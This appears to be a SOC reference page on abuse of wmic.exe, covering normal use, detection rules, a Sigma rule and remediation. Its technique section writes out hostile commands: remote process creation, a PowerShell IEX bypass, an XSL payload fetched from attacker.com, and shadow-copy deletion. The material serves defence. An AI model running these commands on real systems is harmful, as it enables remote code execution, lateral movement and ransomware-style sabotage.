wmic.exeSYSTEM UTILITYwmic.exe - WMI Command Line Security Analysis
wmic.exe is the WMI command-line interface providing access to Windows Management Instrumentation. It is a powerful LOLBin used for remote code execution, lateral movement, reconnaissance, and defense evasion. While deprecated, wmic.exe remains highly abused in attack chains.
Risk Summary
CRITICAL priority for SOC triage. wmic.exe is a versatile LOLBin for execution, recon, and lateral movement. Commands like "process call create", "node:", and XSL execution are **strong indicators of malicious activity**. Note: Deprecated but still present on most systems.
Overview
What is wmic.exe?
wmic.exe is the command-line interface for Windows Management Instrumentation.
Core Functions
WMI Operations:
- System information queries
- Process management
- Remote system management
- Hardware/software inventory
Security Significance
- LOLBin Status: Extensive abuse capabilities
- Remote Execution: Execute code on remote systems
- Recon Tool: System enumeration
- Deprecated: Still present, still abused
Note: wmic.exe is deprecated in Windows 10 21H1+
Normal Behavior
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Windows\System32\wbem\WMIC.exe |
| Parent | cmd.exe, powershell.exe |
| User | Administrator |
| Context | System administration |
Legitimate Usage
wmic os get caption
wmic computersystem get model
Common Locations
C:\Windows\System32\wbem\WMIC.exeC:\Windows\SysWOW64\wbem\WMIC.exeSuspicious Indicators
Legitimate vs Suspicious
LEGITIMATE
Command: wmic os get caption
wmic computersystem list
Context: System inventory
SUSPICIOUS
Command: wmic process call create "cmd /c ..."
wmic /node:TARGET ...
wmic os get /format:xsl
Context: Process creation
Remote execution
XSL stylesheet abuse
High-Risk Commands
| Command | Risk | Purpose |
|---|---|---|
| process call create | CRITICAL | Execute code |
| /node: | CRITICAL | Remote execution |
| /format: (XSL) | CRITICAL | Code execution |
| shadowcopy delete | HIGH | Ransomware indicator |
Abuse Techniques
Attack Techniques
Technique #1: Local Process Creation (T1047)
wmic process call create "powershell -ep bypass -c IEX(...)"
Technique #2: Remote Execution (T1047)
wmic /node:TARGET /user:admin /password:pass process call create "cmd /c C:\malware.exe"
Technique #3: XSL Script Execution (T1220)
wmic os get /format:"http://attacker.com/malicious.xsl"
Technique #4: Reconnaissance (T1082)
wmic qfe list
wmic product get name
wmic useraccount list
Technique #5: Defense Evasion (T1490)
wmic shadowcopy delete
Detection Guidance
Detection Strategies
Priority #1: Process Creation
Process = "wmic.exe" AND
CommandLine CONTAINS "process call create"
→ ALERT: CRITICAL
Priority #2: Remote Node
Process = "wmic.exe" AND
CommandLine CONTAINS "/node:"
→ ALERT: CRITICAL - Remote WMI execution
Priority #3: XSL Abuse
Process = "wmic.exe" AND
CommandLine CONTAINS "/format:" AND
CommandLine CONTAINS ["http", ".xsl"]
→ ALERT: CRITICAL - XSL script execution
Sigma Rule:
title: WMIC Remote Process Creation
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\WMIC.exe'
CommandLine|contains|all:
- '/node:'
- 'process'
- 'call'
- 'create'
condition: selection
level: critical
Remediation Steps
Protection and Remediation
Defense: Disable WMIC
Remove wmic.exe (deprecated anyway):
dism /Online /Remove-Capability /CapabilityName:WMIC~~~~
Defense: Monitor WMI
Enable WMI activity logging.
If Compromise Suspected
- Review wmic command line
- Check for remote connections
- Identify created processes
- Hunt for lateral movement
- Check shadow copies status
Investigation Checklist
Investigation Checklist
- Review full command line
- Check for process creation
- Identify remote targets
- Check for XSL references
- Review spawned processes
- Check shadow copy status
- Hunt for lateral movement